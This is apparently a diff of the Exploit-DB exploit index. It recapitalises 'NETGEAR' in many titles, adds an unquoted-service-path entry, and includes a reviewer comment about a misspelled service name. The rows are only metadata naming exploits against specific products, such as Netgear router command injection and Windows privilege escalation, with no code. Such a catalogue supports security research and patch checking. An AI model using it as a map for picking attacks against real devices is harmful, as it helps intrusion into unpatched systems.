+40442,exploits/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows,
 40443,exploits/windows/local/40443.txt,"Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows,
 40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",local,linux,
 40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64,
@@ -11075,7 +11075,7 @@ id,file,description,date,author,type,platform,port
 48397,exploits/windows/local/48397.txt,"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)",2020-04-29,Vulnerability-Lab,local,windows,
 48398,exploits/windows/local/48398.txt,"EmEditor 19.8 - Insecure File Permissions",2020-04-29,SajjadBnd,local,windows,
 48400,exploits/windows/local/48400.txt,"Druva inSync Windows Client 6.5.2 - Local Privilege Escalation",2020-04-29,"Chris Lyne",local,windows,
-48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,
+48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,
 48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
@@ -11094,6 +11094,7 @@ id,file,description,date,author,type,platform,port
 48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
+48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
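Review bot: The title added for 48591 spells the service name as `Svc10StrikeBandMontitor`, but the `wmic` output in the advisory text added by this same patch lists the service as `Svc10StrikeBandMonitor`, so a search of this index for the real service name will not find the entry. The title also drops the `10-Strike` vendor prefix that the neighbouring 48570 row uses for what appears to be the same product and version. I would change the description field to `"10-Strike Bandwidth Monitor 3.9 - 'Svc10StrikeBandMonitor' Unquoted Service Path"` so that both rows surface together when someone checks whether an installed version is affected.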
@@ -12180,7 +12181,7 @@ id,file,description,date,author,type,platform,port
 7630,exploits/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,remote,windows,
 7701,exploits/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,remote,linux,445
 7706,exploits/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,remote,windows,
-7712,exploits/hardware/remote/7712.txt,"NETGEAR WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware,
+7712,exploits/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware,
 7739,exploits/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method",2009-01-12,"Alfons Luja",remote,windows,
 7747,exploits/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows,
 7748,exploits/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows,
@@ -12319,7 +12320,7 @@ id,file,description,date,author,type,platform,port
 8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",remote,windows,
 8934,exploits/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,remote,windows,
 8938,exploits/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - 'URL' Remote Buffer Overflow",2009-06-12,seer[N.N.U],remote,windows,
-8963,exploits/hardware/remote/8963.txt,"NETGEAR DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware,
+8963,exploits/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware,
 8969,exploits/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,remote,windows,
 8970,exploits/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,remote,windows,
 8986,exploits/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,remote,windows,
@@ -12352,7 +12353,7 @@ id,file,description,date,author,type,platform,port
 9456,exploits/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,remote,hardware,
 9468,exploits/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,remote,windows,69
 9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware,
-9498,exploits/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware,
+9498,exploits/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware,
 9500,exploits/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,remote,windows,
 9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",remote,hardware,
 9508,exploits/windows/remote/9508.rb,"ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,remote,windows,
@@ -12896,7 +12897,7 @@ id,file,description,date,author,type,platform,port
 16383,exploits/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,remote,windows,
 16384,exploits/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows,
 16385,exploits/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,
-16388,exploits/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware,
+16388,exploits/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware,
 16389,exploits/windows/remote/16389.rb,"Omni-NFS Server - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows,
 16390,exploits/windows/remote/16390.rb,"Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)",2010-09-20,Metasploit,remote,windows,
 16391,exploits/windows/remote/16391.rb,"EMC AlphaStor Agent - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,
@@ -14792,7 +14793,7 @@ id,file,description,date,author,type,platform,port
 22224,exploits/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",remote,multiple,
 22226,exploits/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",remote,windows,
 22229,exploits/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",remote,windows,
-22236,exploits/hardware/remote/22236.txt,"NETGEAR FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware,
+22236,exploits/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware,
 22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",remote,hardware,
 22251,exploits/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Remote Buffer Overflow",2006-09-28,RoMaNSoFt,remote,multiple,
 22264,exploits/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",remote,linux,
@@ -14848,9 +14849,9 @@ id,file,description,date,author,type,platform,port
 22448,exploits/windows/remote/22448.txt,"BEA WebLogic 7.0 - Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",remote,windows,
 22449,exploits/unix/remote/22449.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,remote,unix,
 22450,exploits/unix/remote/22450.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,remote,unix,
-22453,exploits/hardware/remote/22453.txt,"NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware,
+22453,exploits/hardware/remote/22453.txt,"Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure",2003-04-03,stickler,remote,hardware,
 22454,exploits/linux/remote/22454.c,"AutomatedShops WebC 2.0/5.0 Script - Name Remote Buffer Overrun",2003-02-16,"Carl Livitt",remote,linux,
-22455,exploits/hardware/remote/22455.txt,"NETGEAR FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware,
+22455,exploits/hardware/remote/22455.txt,"Netgear FM114P ProSafe Wireless Router - Rule Bypass",2003-04-03,stickler,remote,hardware,
 22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple,
 22466,exploits/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - Remote Stack Overflow ROP-Based (SEH) (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",remote,windows,
 22468,exploits/unix/remote/22468.c,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)",2003-04-11,Xpl017Elz,remote,unix,
@@ -15302,7 +15303,7 @@ id,file,description,date,author,type,platform,port
 24133,exploits/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,remote,windows,
 24136,exploits/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",remote,linux,
 24137,exploits/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",remote,multiple,
-24140,exploits/hardware/remote/24140.txt,"NETGEAR RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware,
+24140,exploits/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",remote,hardware,
 24148,exploits/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",remote,multiple,
 24149,exploits/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,remote,php,
 24187,exploits/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,remote,windows,
@@ -15469,7 +15470,7 @@ id,file,description,date,author,type,platform,port
 24904,exploits/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,windows,
 24905,exploits/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,remote,multiple,
 24907,exploits/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",remote,windows,
-24931,exploits/hardware/remote/24931.rb,"NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware,
+24931,exploits/hardware/remote/24931.rb,"Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)",2013-04-08,Metasploit,remote,hardware,
 24935,exploits/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux,
 24936,exploits/hardware/remote/24936.rb,"Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-04-08,Metasploit,remote,hardware,
 24937,exploits/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,remote,linux,
@@ -15486,7 +15487,7 @@ id,file,description,date,author,type,platform,port
 24961,exploits/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,remote,windows,
 24963,exploits/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",remote,multiple,50000
 25091,exploits/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",remote,multiple,
-24974,exploits/hardware/remote/24974.rb,"NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware,
+24974,exploits/hardware/remote/24974.rb,"Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)",2013-04-22,Metasploit,remote,hardware,
 24976,exploits/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,remote,multiple,
 24979,exploits/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",remote,multiple,
 24980,exploits/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",remote,multiple,
@@ -15942,14 +15943,14 @@ id,file,description,date,author,type,platform,port
 29035,exploits/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,remote,windows,
 29045,exploits/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",remote,windows,
 29083,exploits/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",remote,windows,
-29096,exploits/windows/remote/29096.rb,"NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows,
+29096,exploits/windows/remote/29096.rb,"Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",remote,windows,
 29127,exploits/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,remote,hardware,80
 29129,exploits/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,remote,windows,12397
 29130,exploits/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,remote,windows,8080
 29132,exploits/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,remote,unix,80
 29160,exploits/linux/remote/29160.c,"GNU Tar 1.1x - 'GNUTYPE_NAMES' Directory Traversal",2006-11-21,"Teemu Salmela",remote,linux,
 29146,exploits/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",remote,windows,
-29167,exploits/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows,
+29167,exploits/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",remote,windows,
 29171,exploits/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,remote,windows,
 29210,exploits/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,remote,php,80
 29273,exploits/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,remote,hardware,8080
@@ -16034,7 +16035,7 @@ id,file,description,date,author,type,platform,port
 29807,exploits/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Remote Buffer Overflow",2007-03-31,"Stefan Esser",remote,php,
 29808,exploits/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",remote,php,
 29814,exploits/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",remote,windows,
-29815,exploits/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443
+29815,exploits/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,remote,hardware,443
 29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple,
 29952,exploits/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,remote,windows,
 29840,exploits/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",remote,windows,
@@ -16151,7 +16152,7 @@ id,file,description,date,author,type,platform,port
 30645,exploits/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",remote,windows,
 30650,exploits/hardware/remote/30650.txt,"Linksys SPA941 - 'SIP From' HTML Injection",2007-10-09,"Radu State",remote,hardware,
 30652,exploits/hardware/remote/30652.txt,"Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow",2007-10-10,"Andy Davis",remote,hardware,
-30673,exploits/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware,
+30673,exploits/hardware/remote/30673.txt,"Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,remote,hardware,
 30677,exploits/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection",2007-10-16,"Humberto J. Abdelnur",remote,linux,
 30678,exploits/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",remote,multiple,
 30692,exploits/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,remote,windows,
@@ -16525,7 +16526,7 @@ id,file,description,date,author,type,platform,port
 33164,exploits/multiple/remote/33164.txt,"WebKit - Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,remote,multiple,
 33165,exploits/hardware/remote/33165.txt,"2WIRE Routers - 'CD35_SETUP_01' Access Validation",2009-08-12,hkm,remote,hardware,
 33172,exploits/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",remote,windows,
-33177,exploits/hardware/remote/33177.txt,"NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware,
+33177,exploits/hardware/remote/33177.txt,"Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",remote,hardware,
 33192,exploits/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",remote,multiple,
 33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,
 33207,exploits/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Remote Buffer Overflow",2009-09-01,"optix hacker",remote,windows,
@@ -16941,7 +16942,7 @@ id,file,description,date,author,type,platform,port
 35806,exploits/windows/remote/35806.c,"Poison Ivy 2.3.2 - Remote Buffer Overflow",2011-05-27,"Kevin R.V",remote,windows,
 35809,exploits/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,remote,windows,
 35810,exploits/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",remote,linux,
-35817,exploits/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware,
+35817,exploits/hardware/remote/35817.txt,"Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",remote,hardware,
 35818,exploits/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Cross-Site Scripting",2011-06-01,"Stefan Schurtz",remote,multiple,
 35822,exploits/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",remote,windows,
 35836,exploits/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,remote,linux,
@@ -17326,7 +17327,7 @@ id,file,description,date,author,type,platform,port
 39074,exploits/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution",2014-02-03,"Josue Rojas",remote,cgi,
 39105,exploits/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow",2014-02-19,"Julien Ahrens",remote,windows,
 39104,exploits/multiple/remote/39104.py,"Dassault Systemes Catia - Remote Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",remote,multiple,
-39089,exploits/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware,
+39089,exploits/hardware/remote/39089.txt,"Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware,
 39102,exploits/windows/remote/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,remote,windows,
 39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios,
 39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,remote,multiple,
@@ -17361,7 +17362,7 @@ id,file,description,date,author,type,platform,port
 39439,exploits/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",remote,jsp,
 39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux,
 39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,remote,php,80
-39515,exploits/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080
+39515,exploits/windows/remote/39515.rb,"Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,remote,windows,8080
 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,
 39554,exploits/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,remote,php,80
 39568,exploits/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)",2016-03-16,thatchriseckert,remote,hardware,443
@@ -17490,8 +17491,8 @@ id,file,description,date,author,type,platform,port
 40758,exploits/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow (Metasploit)",2016-11-14,Metasploit,remote,windows,
 40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
 40735,exploits/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
-40736,exploits/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
-40737,exploits/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
+40736,exploits/hardware/remote/40736.txt,"Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
+40737,exploits/hardware/remote/40737.sh,"Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
 40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware,
 40740,exploits/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,remote,linux_mips,7547
 40767,exploits/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,remote,windows,
@@ -17517,7 +17518,7 @@ id,file,description,date,author,type,platform,port
 40916,exploits/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",remote,linux,
 40920,exploits/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",remote,linux,
 40930,exploits/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,remote,osx,
-40949,exploits/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80
+40949,exploits/cgi/remote/40949.rb,"Netgear WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80
 40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22
 40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows,
 40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows,
@@ -17545,7 +17546,7 @@ id,file,description,date,author,type,platform,port
 41511,exploits/windows/remote/41511.py,"FTPShell Client 6.53 - Remote Buffer Overflow",2017-03-04,"Peter Baris",remote,windows,
 41545,exploits/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Remote Buffer Overflow",2017-03-07,"Peter Baris",remote,windows,
 41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,remote,windows,
-41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80
